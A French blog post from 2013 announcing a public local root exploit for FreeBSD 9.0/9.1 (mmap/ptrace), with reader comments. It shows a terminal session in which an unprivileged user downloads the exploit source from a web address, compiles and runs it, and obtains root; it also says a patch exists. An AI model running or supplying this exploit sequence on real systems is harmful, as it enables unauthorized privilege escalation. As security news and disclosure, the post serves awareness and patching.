Local Root Exploit : bon anniverssaire FreeBSD !!!


FreeBSD
Ça ressemble à un énorme troll tellement la coïncidence était improbable. FreeBSD vient de fêter ses 20 ans d'existence et pour célébrer cet événement, un certain Hunger, a décidé de rendre publique une faille de type "Local Root Exploit". Cette dernière permet de passer super administrateur sur une FreeBSD 9.1, sans en avoir les privilèges.

Voici un exemple de compromission :

$ uname -a
FreeBSD fbsd91x64 9.1-RELEASE FreeBSD 9.1-RELEASE #0 r243825: Tue Dec
4 09:23:10 UTC 2012
root () farrell cse buffalo edu:/usr/obj/usr/src/sys/GENERIC amd64
$ id
uid=1001(hunger) gid=1002(hunger) groups=1002(hunger)
$ fetch www.tux-planet.fr/public/hack/exploits/kernel/fbsd9lul.c
$ gcc fbsd9lul.c -o fbsd9lul
$ ./fbsd9lul
FreeBSD 9.{0,1} mmap/ptrace exploit
by Hunger <fbsd9lul () hunger hu>
# id
uid=0(root) gid=0(wheel) egid=1002(hunger) groups=1002(hunger)

Un patch est bien entendu déjà disponible. Pensez à mettre à jour vos système.


3 Commentaires pour "Local Root Exploit : bon anniverssaire FreeBSD !!!"

Flux des commentaires de cet article Ajouter un commentaire
  •  

    pfSense impacté ?

    RépondreRépondre
    Mr Xhark , le 20 juin 2013 à 19:01
  •  

    Puissant le ptrace. Cette faille est aussi dispo sur le kernel 9.0 d'après les commentaires de l'auteur.

    @Mr Xhark: Il faut vraiment être en local pour pouvoir utiliser cette faille.

    Patché ?

    RépondreRépondre
    yoshi_Mistake , le 1 juillet 2013 à 00:20
  •  

    Merci beaucoup pour l'information merveilleuse.C'est vraiment important pour moi.Je suis à la recherche ce type d'informations depuis un certain temps et il a finalement obtenu.

    RépondreRépondre
    Jill Hawkins , le 8 juillet 2013 à 09:24
 

Ajouter un commentaire

actualité android apache apple astuce astuces bash bilboblog blog boot chrome clavier commande commandes conky date debian Desktop développement elementary exploit faille fedora firefox flash gimp gnome google graphique Graphisme hack hacking Hardware humour intel internet iphone jailbreak Jeux Kde kernel libre Linux log logiciels Logiciels Libres lucid lynx maemo mail maquette metasploit microsoft mobile mockup monitoring mozilla multi-touch musique mysql n900 nautilus nokia noyau openoffice open source password photos php Planet publicité redhat red hat rpm réseau screenshot script serveur serveurs shell sql ssh statistiques sysadmin system Sécurité thème tux-planet tv twitter ubuntu unity vidéo vidéos vlc voyage wallpaper windows wordpress yum